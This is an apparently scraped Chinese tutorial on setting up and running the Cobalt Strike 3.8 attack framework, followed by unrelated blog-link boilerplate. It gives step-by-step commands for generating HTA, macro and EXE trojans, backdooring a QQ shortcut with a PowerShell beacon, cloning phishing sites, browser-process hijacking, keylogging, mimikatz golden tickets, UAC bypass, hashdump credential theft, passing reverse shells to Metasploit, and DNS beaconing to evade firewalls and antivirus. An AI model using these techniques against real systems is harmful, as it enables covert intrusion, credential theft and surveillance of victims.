cobaltstrike3.8服务器搭建及使用
参考链接:
https://www.ezreal.net/archives/166.html
http://blog.cobaltstrike.com/category/cobalt-strike-2/ cobaltstrike作者博客
https://wujunze.com/wooyun/drops/Cobalt%20Strike%20之团队服务器的搭建与DNS通讯演示.html
cobalt strike从3.0 开始,不再依赖于Metasploit框架而是作为一个独立的平台使用。本次服务器搭建过程使用cobaltstrike3.8。3.0之前的版本,teamserver搭建过程则需要安装配置msf,这里不在赘述。
一、服务器Teamserver搭建
(1)团队服务器上:
(VPS的话要写外网ip,并且可以进行端口映射,默认使用50050端口)
sudo ./teamserver 服务器IP 连接密码
但是这个终端一关闭团队服务器也就关闭了,这里我们可以把他置于后台来运行:
nohup ./teamserver IP 密码 &
这样就可以了,这个目录下会生成一个nohup.out的文件
注意
1.内存使用超过%50 无法启动java虚拟机。
2.3.0之前的版本,结束Cobalt Strike的时候也要同时结束所有 msfrpcd 进程,否则下次会启动不了。
(2)使用客户端连接
java -jar cobaltstrike.jar
个人在使用过程中,曾经出现过jvm内存不够的问题,导致服务器运行出错。可以添加swap虚拟内存,具体可以参考我的另外一篇博文:linux添加swap
二、Cobaltstrike的使用
1.创建Listener
Cobalt Strike首先需要创建一个Listener,用于监听会话和接受shell连接。依次点击 Cobalt Strike->Listeners ,点击Add便可以创建自己想要的Listener。
2. Attacks过程
(1)Packages
这个选项中包含了多种攻击方式。
HTML Application 生成恶意的HTA木马文件;
MS Office Macro 生成office宏病毒文件;
Payload Generator 生成各种语言版本的payload;
USB/CD AutoPlay 生成利用自动播放运行的木马文件;
Windows Dropper 捆绑器,能够对文档类进行捆绑;
Windows Executable 生成可执行exe木马;
Windows Executable(S) 生成无状态的可执行exe木马
举例
HTML Application 生成一个基于powershell的恶意HTA木马
选中attack–>packages–>HTML Application
选择基于powershell的HTA木马
点击Generate保存录即可生成一个HTA木马
当目标点击HTA木马后即可获得一个beacon
MS Office Macro 生成office宏病毒文件
可以参考:Office Phishing
(2)Web Drive-by(钓鱼攻击)
Manage 对开启的web服务进行管理;
Clone Site 克隆网站,可以记录受害者提交的数据;
Host File 提供一个文件下载,可以修改Mime信息;Host File 可以配合DNS欺骗实现挂马效果使用
PowerShell Web Delivery 类似于msf 的web_delivery ;
Signed Applet Attack 使用java自签名的程序进行钓鱼攻击;
Smart Applet Attack 自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本;
System Profiler 用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等。
Spear Phish 用来邮件钓鱼的模块
还有其他的模块其实都差不多
如Signed Applet Attack Smart Applet Attack和S.E.T的java攻击向量相同
powershell web-Drive-by制作快捷方式后门:
依次选择attack–>web-Drive-by–>powershell Drive-by
URI Path:/
Local Port:
Listener:saya
Laubch生成之后会输出一条语句这条语句在powershell运行会得到一个beacon但是一般人不会这么去运行
随便复制一个软件的快捷方式
这里以QQ快捷方式为例子目标,复制我们的powershell语句,起始位置清空,粘贴我们的语句,"应用",当目标点击快捷方式获得beacon
(3)View
Applications 显示受害者机器的应用信息;
Credentials 显示受害者机器的凭证信息,能更方便的进行后续渗透;
Downloads 文件下载;
Event Log 可以看到事件日志,清楚的看到系统的事件,并且团队可以在这里聊天;
Keystrokes 查看键盘记录;
Proxy Pivots 查看代理信息;
Screenshots 查看屏幕截图;
Script Console 在这里可以加载各种脚本以增强功能,脚本地址:https://github.com/rsmudge/cortana-scripts
Targets 查看目标;
Web Log 查看web日志。
Reporting 主要就是出报告用的
(4)Beacon
Beacon可以选择通过DNS还是HTTP协议出口网络,你甚至可以在使用Beacon通讯过程中切换HTTP和DNS。其支持多主机连接,部署 好Beacon后提交一个要连回的域名或主机的列表,Beacon将通过这些主机轮询。目标网络的防护团队必须拦截所有的列表中的主机才可中断和其网络的 通讯。通过种种方式获取shell以后(比如直接运行生成的exe),就可以使用beacon了
右击电脑,Interact,则可打开Beacon Console;为了能快速显示结果,可以设置
beacon>sleep
1)Browserpivot
用户注入受害者浏览器进程,然后开启HTTP代理,之后就可以登录受害者登录的网站了。
使用方式
ps找到浏览器进程PID,如iexplorer.exe,为3452
注入进程:beacon> browserpivot 3452(PID) x64(架构)
注入浏览器进程成功之后,会显示: Browser Pivot HTTP proxy is at: xxx.xxx.xxx.xxx:端口号
设置本地HTTP浏览器代理
当然当被攻击者关闭浏览器的时候,代理也就失效了,关闭此代理可使用如下命令:browserpivot stop
2)Socks
直接开启socks4a代理,可以通过代理进行内网渗透测试。
开启socksbeacon>socks 9999
这里可以选择其中一台,右键Pivoting->SOCKS Server,则使用此台计算机开启socks代理。
配置proxychains.conf,添加: socks4 127.0.0.1 9999
然后就可以通过proxychains 等各种工具做内网渗透了。
msf中开启隧道使用(在连接数据库的情况下,msf会与本地数据库断开)
msf>setg Proxies socks:192.168.1.103.
关闭socks:beacon>socks stop
3)Screenshot
这里的screenshot可以截取受害者一定时间的屏幕截图,操作命令为:
beacon>screenshot [pid] <x86|x64> [run time in seconds]
或者: beacon>screenshot
然后打开View->Screenshots,则可以看到屏幕截图
4)Keylogger键盘记录器
keylogger [pid] <x86|x64>
然后打开View->Keystrokes,则可以看到键盘记录结果
如果不想使用命令行,可以直接选择受害者计算机(可多选)
5)powershell-import
这个功能在后渗透测试中很有用,可以导入各种powershell渗透框架,比如nishang的powerpreter,直接执行:
beacon> powershell-import
然后在文件浏览器里面选择 Powerpreter.psm1
或者直接执行:
powershell-import [/path/to/local/script.ps1]
进行导入,之后就可以使用powerpreter的各种模块了。
要执行某模块直接使用如下命令,比如:beacon> powershell Check-VM
6)kerberos
这里一共有三个模块,分别是:
kerberos_ccache_use 从ccache文件中导入票据
kerberos_ticket_purge 清除当前会话的票据
kerberos_ticket_use 从ticket文件中导入票据
使用mimikatz:
kerberos::golden /admin:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /ticket:FILE
乌云关于kerberos也有相关文章
http://drops.wooyun.org/tips/7547 内网渗透中的mimikatz
http://drops.wooyun.org/tips/9591 域渗透的金之钥匙
7)BypassUAC
直接执行:
beacon> bypassuac
下面你就可以执行那些需要最高权限的操作了。
这一块在测试Win10的时候并没有成功,关于Win10的bypassuac可以参考这篇文章:
使用一个作者修改的powershell脚本invoke-BypassUAC.ps1
生成一个beacon后门:
Windows Executable
Listener:reverse_http
Output: Windows EXE 上传后门:
beacon> cd E:
beacon> upload /Users/evi1cg/Desktop/test.exe
加载powershell执行后门: beacon> powershell-import /Users/evi1cg/Pentest/Powershell/MyShell/invoke-BypassUAC.ps1
beacon> powershell Invoke-BypassUAC -Command 'E:\test.exe' 使用那个破了的电脑的beacon读取密码:
beacon> sleep
beacon> wdigest
beacon> hashdump
三、高级用法
1、cobalt strike派生shell给metasploit
首先我们使用msf的reverse_tcp开启监听模式:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport
lport =>
msf exploit(handler) > exploit
之后使用Cobalt Strike创建一个
windows/foreign/reverse_tcp Listener
其中ip为msf的ip地址,端口为msf所监听的端口。
然后选中计算机,右键->Spawn,选择刚刚创建的监听器:
msf中即可看到成功获取了meterpreter会话
2、Metasploit派生shell给cobaltstrike
你前提需要有一个meterpreter会话 ,然后我们使用这个模块
exploit/windows/local/payload_inject
功能是注入一个新的payload 到当前的session里面
我们先在cobaltstrike上创建一个监听器,等会用于接收msf派生的shell,这里我使用
windows/beacon_http/reverse_http
然后在msf中
use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(payload_inject) > set LHOST 192.168.81.135
LHOST => 192.168.81.135
msf exploit(payload_inject) > set LPORT
LPORT =>
msf exploit(payload_inject) > set SESSION
SESSION =>
msf exploit(payload_inject) > exploit
[*] Running module against WIN-I6HQQE1E7AG
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_http' for PID
msf exploit(payload_inject) >
解释下:
cobaltstrike的监听器我们使用的是:windows/beacon_http/reverse_http,
所以我们msf的payload要使用:windows/meterpreter/reverse_http
设置msf本地监听ip和端口为cobaltstrike机器的ip和端口
默认情况下,payload_inject执行之后会在本地产生一个新的handler,
由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置
set DisablePayloadHandler true
如果出现错误,PID does not actually exist,可以设置一下注入进程的pid。set pid 进程号
3、通过DNS控制目标
Cobalt Strike有个beacons的功能,它可以通过DNS,HTTP,SMB来传输数据,下面我以DNS为例演示下。通过DNS来控制目标和渗透好处是不开端口,能绕过大部分防火墙,隐蔽性好等等。详细文章可参考这篇博文。
1. 域名设置
(1)首先我们的有个域名,并且创建一条A记录指向我们的metasploit服务器,记住不要用CDN什么的
(2)然后再创建2个或3个ns记录指向刚才创建的A记录。这样我们就可以通过dns找到我们的metasploit服务器了。
2. Cobalt Strike设置
在Cobalt Strike中我们添加一个listener
Edit Listener
Payload windows/beacon_dns/reverse_http
host
port
HOST填写的是metasplit服务的IP,在点击Save的时候会要求填写你的NS记录,这里写入我们刚才创建的3个ns记录。接下来创建一个木马测试下。
3. 木马生成
在attack->packages中找到windows木马生成
Windows Executable
Listener: beacon(DNS)
Output: Windows EXE
Listener选择我们刚才创建的(有两个,选择有DNS的那个),输出的有exe,带服务的EXE,dll等。
(连接方式以DNS生成的DLL木马能过掉很大一部分杀毒软件)
把生成的DNS.EXE放到虚拟机中运行。
回到Cobalt Strike打开beacons管理器发现有一个服务端响应了我们
右键是管理菜单,选择sleep设置相应的时间,然后选择interact来到操作界面
4.设置传输模式
传输有dns、dns-txt,http,smb四种,我们这里用的是DNS就在dns、dns-txt中选择把,前者传送的数据小后者传送的数据多。命令
beacon> mode dns-txt(这里可以用TAB补齐命令的)
这中方式好处在于比较对控制目标主机比较隐蔽,缺点在每次的命令的返回结果比较慢,在过防火墙方面还是不错的。
拓展
cobaltstrike3.8服务器搭建及使用的更多相关文章
- Cobalt Strike 服务器搭建及使用
Cobalt Strike使用中的一些坑(一) http://www.cnblogs.com/miaodaren/articles/7829793.html cobaltstrike3.8服务器搭建及 ...
- Git本地服务器搭建及使用详解
Git本地服务器搭建及使用 Git是一款免费.开源的分布式版本控制系统.众所周知的Github便是基于Git的开源代码库以及版本控制系统,由于其远程托管服务仅对开源免费,所以搭建本地Git服务器也是个 ...
- Linux下的SVN服务器搭建
Linux下的SVN服务器搭建 鉴于在搭建时,参考网上很多资料,网上资料在有用的同时,也坑了很多人 本文的目的,也就是想让后继之人在搭建svn服务器时不再犯错,不再被网上漫天的坑爹作品所坑害,故此总 ...
- 版本控制-svn服务器搭建和常用命令(centos 6.3)
Svn是比较优秀的版本控制工具,虽然功能和性能上无法和Git媲美,但由于其容易搭建和使用的特性,所以在各个小公司还是很受欢迎的.使用Git可参考<版本控制-Git服务器搭建和常用命令使用> ...
- 版本控制-Git服务器搭建和常用命令使用
Git是目前世界上最先进的分布式版本控制系统(没有之一).使用Svn的请参考<版本控制-svn服务器搭建和常用命令(centos 6.3)>,下面介绍Git的常用命令 常用命令 简单版 升 ...
- JAVA服务器搭建之问题总结
负责维护公司产品的web服务器搭建与维护,最近遇到一下状况,今天在这里简单总结一下,希望对于刚刚一些刚入行的小伙伴有所帮助,避免再走弯路. 第一点:Tomcat内存设置: 一.常见的Java内存溢出有 ...
- 烂泥:Postfix邮件服务器搭建之虚拟用户配置
virtual_gid_maps = static: virtual_transport = dovecot dovecot_destination_recipient_limit = 1 注意:po ...
- Centos vsftpd服务器搭建
Centos vsftpd服务器搭建 时间:2016-07-18 1.最为简单的vsftpd服务器搭建 1.安装vsftpd 1.yum 安装 yum install vsftpd 2.rpm文件安装 ...
- Linux下的SVN服务器搭建
鉴于在搭建时,参考网上很多资料,网上资料在有用的同时,也坑了很多人 本文的目的,也就是想让后继之人在搭建svn服务器时不再犯错,不再被网上漫天的坑爹作品所坑害,故此总结 /******开始****** ...
随机推荐
- Netty源码分析之服务启动
本节主要分析server的启动过程. Netty是基于Nio实现的,所以也离不开selector.serverSocketChannel.socketChannel和selectKey等,只不过Net ...
- Everything(一款用于检索硬盘文件的工具)
有时候文件夹一多,找不到文件,忘记放哪个盘符怎么办? Everything就能帮你解决,比电脑自带的快多啦,官网在此:http://www.voidtools.com/ (也不大,就几M,没有特别的安 ...
- Tomcat 服务器安装 SSL证书,实现 HTTP 自动跳转 HTTPS
本文以阿里云为例: 一.下载证书 1.1.登录阿里云:https://www.aliyun.com/ 1.2.控制台搜索:SSL证书 1.3.进入 SSL证书控制台 1.4.申请免费 SSL证书,已有 ...
- mybatis教程3(映射文件)
MyBatis 的真正强大在于它的映射语句,也是它的魔力所在.由于它的异常强大,映射器的 XML 文件就显得相对简单.如果拿它跟具有相同功能的 JDBC 代码进行对比,你会立即发现省掉了将近 95% ...
- Spring之Bean的作用域与生命周期
在前面博客中提到容器启动获得BeanDefinition对象中有一个scope 属性.该属性控制着bean对象的作用域.本章节介绍Bean的作用域及生命周期,了解bean是怎么来的又怎么没的. 一.B ...
- C#基础 数据类型 类型转换
本节主要讲解数据类型和各类型之间的转换,两点都是重点,难点在于各种转换的活学活用. 一 数据类型 (一)基本数据类型 1 值类型 (1)整形 int ...
- Spring基于XML方式的使用
一.IoC配置 IoC的配置是通过Spring的xml文件的bean标签进行的. 1.bean标签介绍 bean标签一般是在xml文件进行配置的,xml文件一般样式如下: <?xml versi ...
- blfs(systemv版本)学习笔记-编译安装配置dhcpcd
我的邮箱地址:zytrenren@163.com欢迎大家交流学习纠错! dhcpcd项目地址:http://www.linuxfromscratch.org/blfs/view/8.3/basicne ...
- 【20190123】JavaScript-轮播图特效中出现的问题
使用纯html和JavaScript实现焦点轮播图特效,本来之前用setInterval()函数写的一个简单的循环轮播图,但是出现了两个问题: 1. 当网页被切换时,也就是网页失去焦点时,计时器函 ...
- 【读书笔记】iOS-iOS的UI自动化测试
1,Instruments iOS自带的自动化测试工具. 2,TuneupJs 最早的iOS自动化测试工具 https://github.com/alexvollmer/tuneup_js 3,yn ...